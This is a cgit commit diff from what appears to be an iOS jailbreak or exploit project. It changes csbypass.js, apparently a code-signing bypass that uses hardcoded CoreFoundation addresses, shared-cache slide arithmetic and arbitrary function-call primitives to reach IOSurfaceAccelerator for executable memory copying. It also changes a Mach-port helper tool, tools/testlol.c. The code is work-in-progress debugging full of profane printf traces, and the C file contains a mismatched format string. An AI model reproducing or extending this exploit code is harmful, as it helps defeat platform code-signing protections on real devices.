summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rw-r--r--src/js/csbypass.js26
-rwxr-xr-xtools/testlol.c12
2 files changed, 35 insertions, 3 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index e91dac3..9be80c4 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -7,6 +7,12 @@ var kCFTypeDictionaryValueCallBacks_addr = 0x343c79fc;
var CFDictionarySetValue_addr = 0x2080a791;
var CFNumberCreate_addr = 0x2080bc79;
var kCFNumberSInt32Type = 3;
+var CFShow_addr = 0x208e897c | 1;
+
+var my_kIOSurfaceBytesPerRow;
+var my_kIOSurfaceWidth;
+var my_kIOSurfaceHeight;
+var my_kIOSurfacePixelFormat;
function csbypass() {
printf("hello from csbypass!\n");
@@ -19,17 +25,27 @@ function memcpy_exec(dst, src, size) {
var width = malloc(4);
var height = malloc(4);
var pitch = malloc(4);
- var pixel_format = malloc(4);
+ var pixel_format = malloc(5);
write_u32(width, PAGE_SIZE / (16 * 4));
write_u32(height, 16);
write_u32(pitch, read_u32(width) * 4);
write_u32(pixel_format, 0x42475241); // ARGB
- dict = callnarg(CFDictionaryCreateMutable_addr + get_dyld_shc_slide(), 0, 0, kCFTypeDictionaryKeyCallBacks_addr, kCFTypeDictionaryValueCallBacks_addr);
+ write_u32(pixel_format + 4, 0x0); // ARGB
+ printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
+ dict = callnarg(CFDictionaryCreateMutable_addr + get_dyld_shc_slide(), 0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
printf("dict: %p\n", dict);
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pitch));
+ var test = callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pitch);
+ printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
+ scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
+ callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
+ callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), test);
+ printf("fuck1\n");
callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
+ printf("fuck2\n");
callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceHeight), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
+ printf("fuck3\n");
callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfacePixelFormat), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
+ printf("fuck4\n");
printf("fuck you\n");
printf("%d\n", callnarg(my_IOSurfaceAcceleratorCreate, 0, 0, accel));
}
@@ -47,6 +63,10 @@ function linkIOSurface() {
my_IOSurfaceAcceleratorCreate = dlsym(h, "IOSurfaceAcceleratorCreate");
my_IOSurfaceCreate = dlsym(h, "IOSurfaceCreate");
my_IOSurfaceAcceleratorTransferSurface = dlsym(h, "IOSurfaceAcceleratorTransferSurface");
+
+ CFDictionarySetValue_addr = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue") - get_dyld_shc_slide();
+
+ scall("printf", "%x %x %x\n", my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface);
}
function poc() {
diff --git a/tools/testlol.c b/tools/testlol.c
index 526895b..b957a93 100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -107,7 +107,19 @@ kern_return_t send_ports(mach_port_t target, mach_port_t payload, size_t num, ma
return ret;
}
+struct test {
+ int a;
+ int b;
+ char* c;
+};
+
int main(int argc, char* argv[]) {
+ struct test d;
+ d.a = 1;
+ d.b = 2;
+ d.c = "Hello, world!\n";
+ printf("%x %x %x %x %x %x %x %x\n", d, 0x41414141, 0x41424344);
+ return;
printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
printf("var MACH_PORT_LIMITS_INFO = 0x%x;\n", MACH_PORT_LIMITS_INFO);
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:49:29 +0000